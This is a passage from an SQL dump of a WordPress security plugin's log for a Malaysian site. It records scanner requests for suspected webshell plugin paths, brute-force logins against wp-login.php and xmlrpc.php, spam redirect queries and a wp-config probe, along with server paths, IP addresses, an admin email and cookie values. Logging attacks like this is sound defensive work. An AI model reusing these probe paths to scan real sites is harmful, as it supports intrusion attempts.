01:24:07',35063136,36859600,'https://bintara.com.my/wp-content/plugins/upspy/',1,0,'51.79.4.180'),(27509,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp-content/plugins/ubh/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=757cca64dcb5d35e1c30523a9f6a4956\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-content/plugins/ubh/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-content/plugins/ubh/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfww7-TGwg8JtoKWMVXOgAAAAI\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-content/plugins/ubh/\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-content/plugins/ubh/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfww7-TGwg8JtoKWMVXOgAAAAI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"49456\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-content/plugins/ubh/\";s:10:\"SCRIPT_URL\";s:24:\"/wp-content/plugins/ubh/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfww7-TGwg8JtoKWMVXOgAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238659.9102\";s:12:\"REQUEST_TIME\";s:10:\"1570238659\";}}','notice','2019-10-05 01:24:22','2019-10-05 01:24:20',35065664,36868088,'https://bintara.com.my/wp-content/plugins/ubh/',1,0,'51.79.4.180'),(27510,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:50:\"/wp-content/plugins/vwcleanerplugin/bump.php?cache\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/plugins/vwcleanerplugin/bump.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/plugins/vwcleanerplugin/bump.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfwy7-TGwg8JtoKWMVXQwAAABM\";s:19:\"REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/plugins/vwcleanerplugin/bump.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/plugins/vwcleanerplugin/bump.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfwy7-TGwg8JtoKWMVXQwAAABM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"51712\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/plugins/vwcleanerplugin/bump.php\";s:10:\"SCRIPT_URL\";s:44:\"/wp-content/plugins/vwcleanerplugin/bump.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfwy7-TGwg8JtoKWMVXQwAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238667.1381\";s:12:\"REQUEST_TIME\";s:10:\"1570238667\";}}','notice','2019-10-05 01:24:29','2019-10-05 01:24:27',35060304,36860288,'https://bintara.com.my/wp-content/plugins/vwcleanerplugin/bump.php?cache',1,0,'51.79.4.180'),(27511,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:36:\"/wp-content/plugins/xichang/x.php?xi\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/wp-content/plugins/xichang/x.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:33:\"/wp-content/plugins/xichang/x.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfw0r-TGwg8JtoKWMVXRwAAABU\";s:19:\"REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/wp-content/plugins/xichang/x.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:33:\"/wp-content/plugins/xichang/x.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfw0r-TGwg8JtoKWMVXRwAAABU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"53466\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:55:\"https://bintara.com.my/wp-content/plugins/xichang/x.php\";s:10:\"SCRIPT_URL\";s:33:\"/wp-content/plugins/xichang/x.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfw0r-TGwg8JtoKWMVXRwAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238674.9567\";s:12:\"REQUEST_TIME\";s:10:\"1570238674\";}}','notice','2019-10-05 01:24:36','2019-10-05 01:24:35',35059224,36866312,'https://bintara.com.my/wp-content/plugins/xichang/x.php?xi',1,0,'51.79.4.180'),(24904,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"92.53.114.87\";s:11:\"REMOTE_PORT\";s:5:\"41310\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG0-q1FqYKvioG46Y4mjgAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568781566.5088\";s:12:\"REQUEST_TIME\";s:10:\"1568781566\";}}','notice','2019-09-18 04:39:27','2019-09-18 04:39:26',17740768,19232240,'https://bintara.com.my/wp-login.php',1,0,'92.53.114.87'),(24903,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.70.191\";s:11:\"REMOTE_PORT\";s:5:\"48448\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGz2K1FqYKvioG46Y4lswAAAIw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568781272.5011\";s:12:\"REQUEST_TIME\";s:10:\"1568781272\";}}','notice','2019-09-18 04:34:33','2019-09-18 04:34:32',18260272,19559456,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.70.191'),(27679,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Whale/1.0.40.10 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"52552\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxtSMfRZ9CaO@EBI5ngdQAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570532680.3427\";s:12:\"REQUEST_TIME\";s:10:\"1570532680\";}}','notice','2019-10-08 11:04:43','2019-10-08 11:04:40',35037512,36845880,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27678,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:124:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Whale/1.0.40.10 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:122:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"51776\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxtQMfRZ9CaO@EBI5ngcwAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570532672.7362\";s:12:\"REQUEST_TIME\";s:10:\"1570532672\";}}','notice','2019-10-08 11:04:35','2019-10-08 11:04:33',35421168,37228608,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27677,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/skype-for-business/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/skype-for-business/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/skype-for-business/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxptcfRZ9CaO@EBI5neJwAAAJY\";s:12:\"REDIRECT_URL\";s:20:\"/skype-for-business/\";s:11:\"REMOTE_ADDR\";s:12:\"54.36.149.79\";s:11:\"REMOTE_PORT\";s:5:\"18656\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/skype-for-business/\";s:10:\"SCRIPT_URL\";s:20:\"/skype-for-business/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxptcfRZ9CaO@EBI5neJwAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570531765.1522\";s:12:\"REQUEST_TIME\";s:10:\"1570531765\";}}','notice','2019-10-08 10:49:28','2019-10-08 10:49:25',35526352,37324224,'https://bintara.com.my/skype-for-business/',1,0,'54.36.149.79'),(27676,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp-config.php12\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1a635b4481b1dd83a1f44581157cd4a6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 